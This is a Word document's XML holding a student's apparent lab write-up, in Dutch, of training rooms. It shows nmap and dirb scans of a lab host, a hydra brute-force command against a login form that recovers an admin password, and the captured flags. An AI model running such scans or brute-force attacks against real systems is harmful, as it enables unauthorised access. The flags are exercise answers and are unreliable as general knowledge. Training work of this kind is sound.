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14CEF8" w14:textId="2208470F" w:rsidR="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r>
        <w:t xml:space="preserve">Resultaten CHapter 4 try hack me rooms </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DD7BA3" w14:textId="77777777" w:rsidR="00626211" w:rsidRDefault="00626211" w:rsidP="00626211"/>
    <w:p w14:paraId="6C8B2EC7" w14:textId="77777777" w:rsidR="00626211" w:rsidRDefault="00626211" w:rsidP="00626211"/>
    <w:p w14:paraId="297E72F2" w14:textId="18DCE007" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-07 04:04 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730C8667" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>Nmap scan report for 10.114.70.239</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428D0B1D" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>Host is up (0.033s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F02E61" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>Not shown: 996 closed tcp ports (reset)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143006B9" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>PORT     STATE SERVICE VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117EA5A0" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.11 (Ubuntu Linux; protocol 2.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A4AA5D" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>| ssh-hostkey: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42289750" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>|   256 f5:53:49:00:b1:b9:fa:2a:e8:33:31:2d:d0:67:aa:79 (ECDSA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A41B6A0" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>|_  256 8f:fc:cd:b5:3b:b2:72:a8:53:0b:9d:29:9e:a9:84:df (ED25519)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3607D471" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>80/tcp   open  http    nginx 1.27.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656DD55B" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>|_http-title: Blog Website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419EE9E3" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>|_http-server-header: nginx/1.27.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087F7D8A" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>3000/tcp open  http    Node.js Express framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFFC2F8" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>|_http-cors: GET POST PUT DELETE PATCH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E76188" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>|_http-title: SeclabTemp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02959C84" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>8080/tcp open  http    Apache httpd 2.4.54 ((Debian))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A21C0A" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>|_http-server-header: Apache/2.4.54 (Debian)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261A8C4B" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>|_http-open-proxy: Proxy might be redirecting requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6384EFDD" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>|_http-title: PXL intranet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF2CA39" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6644DDD9" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211"/>
    <w:p w14:paraId="7AFFB275" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6E3089" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:t>Nmap done: 1 IP address (1 host up) scanned in 19.01 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2448BF54" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211"/>
    <w:p w14:paraId="0E980625" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="00626211" w:rsidP="007B5482">
      <w:r w:rsidRPr="00626211">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2 de deel vragen </w:t>
      </w:r>
      <w:r w:rsidRPr="00626211">
        <w:br/>
      </w:r>
      <w:r w:rsidR="007B5482">
        <w:t>┌──(kali</w:t>
      </w:r>
      <w:r w:rsidR="007B5482">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r w:rsidR="007B5482">
        <w:t>kali)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793084F7" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:r>
        <w:t>└─$ dirb http://10.114.70.239 /usr/share/wordlists/dirb/common.txt -X .php,.txt,.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5569FB87" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482"/>
    <w:p w14:paraId="5DE3575D" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:r>
        <w:t>-----------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759B6525" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:r>
        <w:t xml:space="preserve">DIRB v2.22    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65843EE4" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:r>
        <w:t>By The Dark Raver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6D93D0" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:r>
        <w:t>-----------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCC4405" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482"/>
    <w:p w14:paraId="2A5A22CC" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:r>
        <w:t>START_TIME: Tue Apr  7 04:37:49 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF5C1AD" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:r>
        <w:t>URL_BASE: http://10.114.70.239/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1513F453" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:r>
        <w:t>WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3990CBE6" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:r>
        <w:t>EXTENSIONS_LIST: (.php,.txt,.html) | (.php)(.txt)(.html) [NUM = 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EB15CB" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482"/>
    <w:p w14:paraId="0FAFBB0E" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:r>
        <w:t>-----------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A7C54E" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482"/>
    <w:p w14:paraId="36491B2D" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:r>
        <w:t xml:space="preserve">GENERATED WORDS: 4612                                                          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA45F05" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482"/>
    <w:p w14:paraId="15DE1C35" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:r>
        <w:t>---- Scanning URL: http://10.114.70.239/ ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ECEB7C" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:r>
        <w:t xml:space="preserve">+ http://10.114.70.239/administrator.html (CODE:200|SIZE:48)                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10129970" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:r>
        <w:t xml:space="preserve">+ http://10.114.70.239/index.html (CODE:200|SIZE:2665)                                                           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349529AA" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:r>
        <w:t xml:space="preserve">+ http://10.114.70.239/robots.txt (CODE:200|SIZE:39)                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596C3FA4" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:r>
        <w:t xml:space="preserve">                                                                                                                 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D24B19" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:r>
        <w:t>-----------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2697D3BA" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:r>
        <w:t>END_TIME: Tue Apr  7 04:45:20 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A251A6" w14:textId="77777777" w:rsidR="007B5482" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:r>
        <w:t>DOWNLOADED: 13836 - FOUND: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128194A3" w14:textId="5323274B" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="007B5482" w:rsidP="007B5482">
      <w:r>
        <w:t xml:space="preserve">                                      </w:t>
      </w:r>
      <w:r w:rsidR="00626211" w:rsidRPr="00626211">
        <w:t>                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102FE465" w14:textId="77777777" w:rsidR="00626211" w:rsidRPr="00626211" w:rsidRDefault="00626211" w:rsidP="00626211"/>
    <w:p w14:paraId="435635DF" w14:textId="18A2CE29" w:rsidR="007B5482" w:rsidRDefault="00626211" w:rsidP="00626211">
      <w:r w:rsidRPr="00626211">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">eerste flag = </w:t>
      </w:r>
      <w:r w:rsidR="007B5482" w:rsidRPr="007B5482">
        <w:t>PXL{9eebb49d33499a8f0d952ca80c79099e}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1859B7FF" w14:textId="22FA6ED5" w:rsidR="00626211" w:rsidRDefault="007B5482" w:rsidP="00626211">
      <w:r>
        <w:t xml:space="preserve">tweede flag = </w:t>
      </w:r>
      <w:r w:rsidR="00626211" w:rsidRPr="00626211">
        <w:t>PXL{6423cefb17bbcb5e9267499ade46ff46}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFB6CEF" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRDefault="00CC2B10" w:rsidP="00626211"/>
    <w:p w14:paraId="5C6E04E2" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRDefault="00CC2B10" w:rsidP="00626211"/>
    <w:p w14:paraId="322148CB" w14:textId="2E5CDE9F" w:rsidR="00CC2B10" w:rsidRDefault="00CC2B10" w:rsidP="00626211">
      <w:r>
        <w:t>tast 3 bruteforce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26547010" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10">
      <w:r>
        <w:t>┌──(kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>㉿</w:t>
      </w:r>
      <w:r>
        <w:t>kali)-[~]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105BD162" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10">
      <w:r>
        <w:t>└─$ hydra -l admin -P ~/passwords.txt 10.114.70.239 -s 8080 http-post-form "/index.php:gebruiker=^USER^&amp;wachtwoord=^PASS^:F=Invalid password"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7C5F97" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10">
      <w:r>
        <w:t>Hydra v9.6 (c) 2023 by van Hauser/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176BE62B" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10"/>
    <w:p w14:paraId="2169CFF2" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10">
      <w:r>
        <w:t>Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-04-07 05:15:05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735B45F6" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10">
      <w:r>
        <w:t>[DATA] max 16 tasks per 1 server, overall 16 tasks, 283 login tries (l:1/p:283), ~18 tries per task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F97E069" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10">
      <w:r>
        <w:t>[DATA] attacking http-post-form://10.114.70.239:8080/index.php:gebruiker=^USER^&amp;wachtwoord=^PASS^:F=Invalid password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5088E14D" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10">
      <w:r>
        <w:t xml:space="preserve">[8080][http-post-form] host: 10.114.70.239   </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2B10">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>login: admin   password: purple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3839EA" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10">
      <w:r>
        <w:t>1 of 1 target successfully completed, 1 valid password found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DE0DA8" w14:textId="3E1291E9" w:rsidR="00CC2B10" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10">
      <w:r>
        <w:t>Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-04-07 05:15:13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33355397" w14:textId="77777777" w:rsidR="00CC2B10" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10"/>
    <w:p w14:paraId="32626EEF" w14:textId="77777777" w:rsidR="00D343B8" w:rsidRDefault="00CC2B10" w:rsidP="00D343B8">
      <w:r>
        <w:t xml:space="preserve">Flag 1 = </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2B10">
        <w:t>PXL{6859d319aaf360047dd4495092230026}</w:t>
      </w:r>
      <w:r w:rsidR="00D343B8">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D343B8">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB44C46" w14:textId="47986654" w:rsidR="00D343B8" w:rsidRDefault="00D343B8" w:rsidP="00D343B8">
      <w:r>
        <w:t>Welcome admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DF241F" w14:textId="77777777" w:rsidR="00D343B8" w:rsidRDefault="00D343B8" w:rsidP="00D343B8">
      <w:r>
        <w:t>PXL{6859d319aaf360047dd4495092230026}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C799B7E" w14:textId="77777777" w:rsidR="00D343B8" w:rsidRDefault="00D343B8" w:rsidP="00D343B8"/>
    <w:p w14:paraId="204F0FA3" w14:textId="77777777" w:rsidR="00D343B8" w:rsidRDefault="00D343B8" w:rsidP="00D343B8">
      <w:r>
        <w:t xml:space="preserve">    Real Name: John Doe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1417920C" w14:textId="77777777" w:rsidR="00D343B8" w:rsidRDefault="00D343B8" w:rsidP="00D343B8">
      <w:r>
        <w:t xml:space="preserve">    Address: Elfde-liniestraat 124 Hasselt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674A81D1" w14:textId="7FCB6693" w:rsidR="00D343B8" w:rsidRDefault="00D343B8" w:rsidP="00D343B8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Email: </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="00C3371B" w:rsidRPr="00330D9C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>admin@pxl.be</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="493B5A40" w14:textId="77777777" w:rsidR="00C3371B" w:rsidRDefault="00C3371B" w:rsidP="00D343B8"/>
    <w:p w14:paraId="46F99542" w14:textId="4A3DCB06" w:rsidR="00C3371B" w:rsidRDefault="00C3371B" w:rsidP="00D343B8">
      <w:r>
        <w:t xml:space="preserve">Flag 2 = </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3371B">
        <w:t>PXL{f9b3dd84fd0a876f0013451efcfee849}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve"> gevonden in de cookies </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9CA33A" w14:textId="30631641" w:rsidR="00CC2B10" w:rsidRDefault="00CC2B10" w:rsidP="00CC2B10"/>
    <w:p w14:paraId="58CD9715" w14:textId="77777777" w:rsidR="00D343B8" w:rsidRDefault="00D343B8" w:rsidP="00CC2B10"/>
    <w:p w14:paraId="7D4CC121" w14:textId="77777777" w:rsidR="00D343B8" w:rsidRPr="00626211" w:rsidRDefault="00D343B8" w:rsidP="00CC2B10"/>
    <w:p w14:paraId="7D4D7C8C" w14:textId="77777777" w:rsidR="00626211" w:rsidRDefault="00626211"/>
    <w:sectPr w:rsidR="0062621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6211"/>
    <w:rsid w:val="00132642"/>
    <w:rsid w:val="002261B7"/>
    <w:rsid w:val="00626211"/>
    <w:rsid w:val="007B5482"/>
    <w:rsid w:val="008A740B"/>
    <w:rsid w:val="00C3371B"/>
    <w:rsid w:val="00CC2B10"/>
    <w:rsid w:val="00D343B8"/>
    <w:rsid w:val="00DE7F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37CE7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4876FE9B-4C6E-4E77-8FF2-330FEDC944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626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626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6262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626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6262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626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626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626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626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6262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6262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6262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626211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626211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626211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626211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626211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62621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626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626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626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626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626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626211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626211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626211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6262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626211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62621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Standaardalinea-lettertype"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C3371B"/>
    <w:rPr>
      <w:color w:val="467886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C337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admin@pxl.be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4269</TotalTime>
  <Pages>1</Pages>
  <Words>544</Words>
  <Characters>2993</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>24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Kobe Vandeput</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kobe Vandeput</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-07T08:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-10T07:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>